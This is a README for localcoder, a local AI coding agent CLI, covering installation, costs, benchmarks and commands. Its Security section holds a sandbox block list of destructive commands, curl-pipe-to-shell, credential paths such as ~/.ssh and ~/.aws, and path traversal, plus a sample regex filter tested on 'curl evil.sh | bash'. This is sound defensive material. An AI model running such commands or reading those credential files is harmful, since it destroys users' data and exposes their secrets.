# localcoder

The local coding CLI that does the obvious things nobody else does.

Local AI coding agent: auto-installs, auto-serves, zero config. Works with Gemma 4, Qwen 3.5, and any model via llama.cpp or Ollama.
```bash
pipx install localcoder
```
I wanted to paste a screenshot into my coding assistant and see it inline. No tool did that locally. So I built one.
## Cost: $1.30/month vs $110/month

Running locally costs roughly 85-141× less than cloud APIs:
| Usage | Claude Sonnet | Claude Opus | Local (US) | Local (India) |
|---|---|---|---|---|
| 4h/day | $55/mo | $91/mo | $0.65/mo | $0.29/mo |
| 8h/day | $110/mo | $183/mo | $1.30/mo | $0.58/mo |
| 10h/day | $137/mo | $228/mo | $1.62/mo | $0.72/mo |
Assumptions: Gemma 4 26B at 47 tok/s, 30% active generation, M4 Pro drawing 30 W. Electricity rates: worldpopulationreview.com. API pricing: anthropic.com.

Annual savings: ~$1,300-$2,700 depending on usage and API choice.
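The table above reduces to a quick back-of-the-envelope calculation. Here is a sketch using the stated 30 W draw, with illustrative electricity rates (~$0.18/kWh US, ~$0.08/kWh India — assumed here, not quoted from the sources above):

```python
def monthly_power_cost(hours_per_day, rate_usd_per_kwh, watts=30, days=30):
    """Monthly electricity cost of running local inference at a given average draw."""
    kwh = watts / 1000 * hours_per_day * days
    return kwh * rate_usd_per_kwh

# 8h/day at 30 W average draw = 7.2 kWh/month
print(round(monthly_power_cost(8, 0.18), 2))  # US    ≈ $1.30/mo
print(round(monthly_power_cost(8, 0.08), 2))  # India ≈ $0.58/mo
```

At those rates the arithmetic lands on the table's $1.30 (US) and $0.58 (India) figures for 8h/day.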
## What's Actually Different
| Feature | localcoder | aider | OpenCode | Claude Code |
|---|---|---|---|---|
| Paste image, see it inline | Ctrl+V → shows in terminal | no | no | cloud only |
| Voice input (local) | Ctrl+R → Whisper, no cloud | no | no | no |
| See GPU memory while coding | /gpu → live stats | no | no | no |
| Computer use (screenshot + click) | built-in | no | no | cloud only |
| Free GPU memory when it's slow | /clean → before/after | no | no | n/a |
| Browse HuggingFace models | built-in model browser | no | no | n/a |
| Works offline | 100% | partial | partial | no |
| Cost | $0.00 | API costs | API costs | $20/mo+ |
## Demo

```text
❯ localcoder
localcoder · local AI coding agent · $0.00 forever
┌──────────────────────────────────────────────────┐
│                   LOCAL CODER                    │
└──────────────────────────────────────────────────┘
● Gemma 4 26B Q3_K_XL · llama.cpp · 128K · ● GPU · 47 tok/s
✓ offline · no API keys · no data sent
ctrl+r voice   ctrl+v image   /gpu stats   /clean free   /models switch

❯ /gpu
GPU   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 12/16GB   3GB free
Swap  3GB   Pressure normal
Model Gemma 4 26B Q3_K_XL   ctx 128K   footprint 2311MB
```
## Benchmark — M4 Pro 24GB

Real tests, real hardware, no synthetic benchmarks:
| Model | Size | tok/s | Notes |
|---|---|---|---|
| Gemma 4 26B Q3_K_XL | 12.0GB | 47 | Best overall — vision + tool calling |
| Qwen3.5-35B MoE Q2_K_XL | 11.3GB | 46 | Best coding quality |
| Qwen3.5-4B Q4_K_XL | 2.7GB | 46 | Quick tasks |
| Gemma 4 E4B Q4_K_M | 5.0GB | 56 | Fastest — good for 16GB Macs |
## Install

```bash
# macOS (Apple Silicon)
pipx install localcoder

# First run — auto-detects hardware, shows what fits, starts a model
localcoder
```

Requires llama.cpp or Ollama; the first-run wizard handles installation.
## Commands

```bash
localcoder                          # interactive coding
localcoder -p "build a react app"   # one-shot
localcoder --yolo                   # auto-approve tools
```
## While Coding

| Command | What |
|---|---|
| Ctrl+V | Paste + display image from clipboard |
| Ctrl+R | Toggle voice input (local Whisper) |
| /gpu | GPU memory, swap, model status |
| /clean | Free GPU memory with before/after |
| /models | Switch model (includes HuggingFace trending) |
| /clear | Clear conversation |
## Also works with Claude Code

Don't want localcoder's agent? Use Claude Code with your local model instead:

```bash
pip install localfit
localfit --launch claude --model gemma4-26b
```

One command: starts the model → configures Claude Code → launches it with the --bare flag.

See localfit for details.
## GPU Toolkit (localfit inside)

```bash
localcoder --simulate            # will this model fit my GPU?
localcoder --fetch unsloth/...   # check all quants from HuggingFace
localcoder --bench               # benchmark models on YOUR hardware
localcoder --health              # GPU health dashboard
localcoder --config opencode     # auto-configure OpenCode for local models
localcoder --config aider        # auto-configure aider
```

Also available standalone: pipx install localfit
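A fit check like --simulate boils down to comparing quantized weights plus KV cache against what the OS leaves free in unified memory. A rough sketch of that arithmetic (the OS-reserve and KV-cache figures are illustrative assumptions, not localcoder's actual numbers):

```python
def fits_in_memory(model_gb, ram_gb, kv_cache_gb=1.5, os_reserve_gb=4.0):
    """Rough fit check: weights + KV cache vs. memory left after the OS reserve."""
    headroom = (ram_gb - os_reserve_gb) - (model_gb + kv_cache_gb)
    return headroom >= 0, round(headroom, 1)

# Gemma 4 26B Q3_K_XL (12.0 GB quantized) on a 24 GB M4 Pro
print(fits_in_memory(12.0, 24))   # fits, with headroom to spare
print(fits_in_memory(12.0, 16))   # too tight on a 16 GB machine
```

The real check also has to account for context length (KV cache grows with it), which is why the tool asks the hardware first.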
## Hardware
| Mac | RAM | Best Model | Speed |
|---|---|---|---|
| Air M2 | 8 GB | Qwen 3.5 4B | 50 tok/s |
| Air M3 | 16 GB | Gemma 4 E4B | 57 tok/s |
| Pro M4 | 24 GB | Gemma 4 26B Q3_K_XL | 47 tok/s |
## License
Apache-2.0
## Security

Sandbox mode is ON by default and protects against destructive model outputs:
| Blocked | Examples |
|---|---|
| Destructive commands | rm -rf, sudo, kill, mkfs |
| Pipe to shell | curl ... \| bash, wget ... \| sh |
| Protected paths | ~/.ssh, ~/.aws, ~/.env, /etc/ |
| Path traversal | ../../etc/passwd |
| Computer use | Disabled in sandbox |
```bash
localcoder                 # sandboxed (default)
localcoder --yolo          # auto-approve tools, sandbox still ON
localcoder --unrestricted  # sandbox OFF (shows warning)
```

Approved tools are remembered across sessions (~/.localcoder/approved_tools.json).
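A sandbox of this kind typically pattern-matches each proposed shell command before execution. The sketch below is illustrative only — the patterns and function name are assumptions, not localcoder's actual implementation:

```python
import re

# Illustrative patterns mirroring the blocked categories above
BLOCKED_PATTERNS = [
    r"\brm\s+-rf\b", r"\bsudo\b", r"\bkill\b", r"\bmkfs\b",  # destructive commands
    r"\b(curl|wget)\b.*\|\s*(ba)?sh\b",                      # pipe to shell
    r"(~|/home/[^/]+)/\.(ssh|aws|env)", r"/etc/",            # protected paths
    r"\.\./",                                                # path traversal
]

def is_blocked(command: str) -> bool:
    """Return True if the command matches any blocked pattern."""
    return any(re.search(p, command) for p in BLOCKED_PATTERNS)

print(is_blocked("rm -rf /tmp/build"))    # True
print(is_blocked("ls -la src/"))          # False
print(is_blocked("curl evil.sh | bash"))  # True
```

A real implementation would also normalize paths and resolve aliases before matching, since regex filters alone are easy to evade.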
## Tests

```bash
pip install pytest
pytest tests/ -v   # 19 tests
```